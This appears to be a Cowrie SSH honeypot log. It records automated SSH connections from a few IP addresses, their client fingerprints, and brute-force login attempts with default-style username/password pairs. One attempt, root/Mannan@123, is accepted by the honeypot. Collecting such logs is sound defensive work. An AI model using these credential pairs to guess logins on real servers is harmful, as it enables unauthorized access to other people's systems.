{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36786,"dst_ip":"1.2.3.4","dst_port":22,"session":"a6d58a514ea6","protocol":"ssh","message":"New connection: 212.227.125.160:36786 (1.2.3.4:22) [session: a6d58a514ea6]","sensor":"my-vps","timestamp":"2025-08-26T11:30:54.965889Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:30:54.984425Z","src_ip":"212.227.125.160","session":"a6d58a514ea6"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:30:55.017425Z","src_ip":"212.227.125.160","session":"a6d58a514ea6"}
{"eventid":"cowrie.login.failed","username":"aes-admin","password":"aes-admin","message":"login attempt [aes-admin/aes-admin] failed","sensor":"my-vps","timestamp":"2025-08-26T11:30:55.261117Z","src_ip":"212.227.125.160","session":"a6d58a514ea6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:30:56.536096Z","src_ip":"212.227.125.160","session":"a6d58a514ea6"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37556,"dst_ip":"1.2.3.4","dst_port":22,"session":"23d83d8dee0e","protocol":"ssh","message":"New connection: 212.227.125.160:37556 (1.2.3.4:22) [session: 23d83d8dee0e]","sensor":"my-vps","timestamp":"2025-08-26T11:31:01.140708Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:01.141756Z","src_ip":"212.227.125.160","session":"23d83d8dee0e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:01.225073Z","src_ip":"212.227.125.160","session":"23d83d8dee0e"}
{"eventid":"cowrie.login.failed","username":"kubernetes","password":"kubernetes","message":"login attempt [kubernetes/kubernetes] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:01.414804Z","src_ip":"212.227.125.160","session":"23d83d8dee0e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37770,"dst_ip":"1.2.3.4","dst_port":22,"session":"5d5b442a51c8","protocol":"ssh","message":"New connection: 212.227.235.229:37770 (1.2.3.4:22) [session: 5d5b442a51c8]","sensor":"my-vps","timestamp":"2025-08-26T11:31:02.338874Z"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:02.485859Z","src_ip":"212.227.125.160","session":"23d83d8dee0e"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:03.111183Z","src_ip":"212.227.235.229","session":"5d5b442a51c8"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:03.111851Z","src_ip":"212.227.235.229","session":"5d5b442a51c8"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":36274,"dst_ip":"1.2.3.4","dst_port":22,"session":"c82e1b3d0664","protocol":"ssh","message":"New connection: 83.168.105.65:36274 (1.2.3.4:22) [session: c82e1b3d0664]","sensor":"my-vps","timestamp":"2025-08-26T11:31:04.059259Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:04.060141Z","src_ip":"83.168.105.65","session":"c82e1b3d0664"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:04.097904Z","src_ip":"83.168.105.65","session":"c82e1b3d0664"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"nginx123","message":"login attempt [nginx/nginx123] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:04.211298Z","src_ip":"83.168.105.65","session":"c82e1b3d0664"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:05.249664Z","src_ip":"83.168.105.65","session":"c82e1b3d0664"}
{"eventid":"cowrie.login.success","username":"root","password":"Mannan@123","message":"login attempt [root/Mannan@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T11:31:06.769548Z","src_ip":"212.227.235.229","session":"5d5b442a51c8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":38324,"dst_ip":"1.2.3.4","dst_port":22,"session":"2bf79aac7d45","protocol":"ssh","message":"New connection: 212.227.125.160:38324 (1.2.3.4:22) [session: 2bf79aac7d45]","sensor":"my-vps","timestamp":"2025-08-26T11:31:07.195924Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:07.196759Z","src_ip":"212.227.125.160","session":"2bf79aac7d45"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:07.247416Z","src_ip":"212.227.125.160","session":"2bf79aac7d45"}
{"eventid":"cowrie.session.closed","duration":"5.0","message":"Connection lost after 5.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:07.309983Z","src_ip":"212.227.235.229","session":"5d5b442a51c8"}
{"eventid":"cowrie.login.failed","username":"stptbdd","password":"stptbdd","message":"login attempt [stptbdd/stptbdd] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:07.415501Z","src_ip":"212.227.125.160","session":"2bf79aac7d45"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:08.468530Z","src_ip":"212.227.125.160","session":"2bf79aac7d45"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39098,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9669608d794","protocol":"ssh","message":"New connection: 212.227.125.160:39098 (1.2.3.4:22) [session: e9669608d794]","sensor":"my-vps","timestamp":"2025-08-26T11:31:13.005647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:13.006741Z","src_ip":"212.227.125.160","session":"e9669608d794"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:13.058115Z","src_ip":"212.227.125.160","session":"e9669608d794"}
{"eventid":"cowrie.login.failed","username":"operator","password":"operator","message":"login attempt [operator/operator] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:13.218295Z","src_ip":"212.227.125.160","session":"e9669608d794"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:14.545562Z","src_ip":"212.227.125.160","session":"e9669608d794"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39870,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5e0a87e9231","protocol":"ssh","message":"New connection: 212.227.125.160:39870 (1.2.3.4:22) [session: a5e0a87e9231]","sensor":"my-vps","timestamp":"2025-08-26T11:31:18.833843Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:18.835080Z","src_ip":"212.227.125.160","session":"a5e0a87e9231"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:18.883380Z","src_ip":"212.227.125.160","session":"a5e0a87e9231"}
{"eventid":"cowrie.login.failed","username":"maps","password":"maps","message":"login attempt [maps/maps] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:19.338722Z","src_ip":"212.227.125.160","session":"a5e0a87e9231"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":34660,"dst_ip":"1.2.3.4","dst_port":22,"session":"5b9649516739","protocol":"ssh","message":"New connection: 83.168.105.65:34660 (1.2.3.4:22) [session: 5b9649516739]","sensor":"my-vps","timestamp":"2025-08-26T11:31:19.505857Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:19.506871Z","src_ip":"83.168.105.65","session":"5b9649516739"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:19.542349Z","src_ip":"83.168.105.65","session":"5b9649516739"}
{"eventid":"cowrie.login.failed","username":"esuser","password":"123456","message":"login attempt [esuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:19.651540Z","src_ip":"83.168.105.65","session":"5b9649516739"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:20.491472Z","src_ip":"212.227.125.160","session":"a5e0a87e9231"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:20.689075Z","src_ip":"83.168.105.65","session":"5b9649516739"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40642,"dst_ip":"1.2.3.4","dst_port":22,"session":"f71745b09c26","protocol":"ssh","message":"New connection: 212.227.125.160:40642 (1.2.3.4:22) [session: f71745b09c26]","sensor":"my-vps","timestamp":"2025-08-26T11:31:24.955799Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:24.957688Z","src_ip":"212.227.125.160","session":"f71745b09c26"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:25.005878Z","src_ip":"212.227.125.160","session":"f71745b09c26"}
{"eventid":"cowrie.login.failed","username":"test","password":"123456","message":"login attempt [test/123456] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:25.575359Z","src_ip":"212.227.125.160","session":"f71745b09c26"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T11:31:26.629645Z","src_ip":"212.227.125.160","session":"f71745b09c26"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41408,"dst_ip":"1.2.3.4","dst_port":22,"session":"25a969500180","protocol":"ssh","message":"New connection: 212.227.125.160:41408 (1.2.3.4:22) [session: 25a969500180]","sensor":"my-vps","timestamp":"2025-08-26T11:31:30.790001Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T11:31:30.816259Z","src_ip":"212.227.125.160","session":"25a969500180"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T11:31:30.847831Z","src_ip":"212.227.125.160","session":"25a969500180"}
{"eventid":"cowrie.login.failed","username":"ranger","password":"ranger","message":"login attempt [ranger/ranger] failed","sensor":"my-vps","timestamp":"2025-08-26T11:31:31.067821Z","src_ip":"212.227.125.160","session":"25a969500180"}
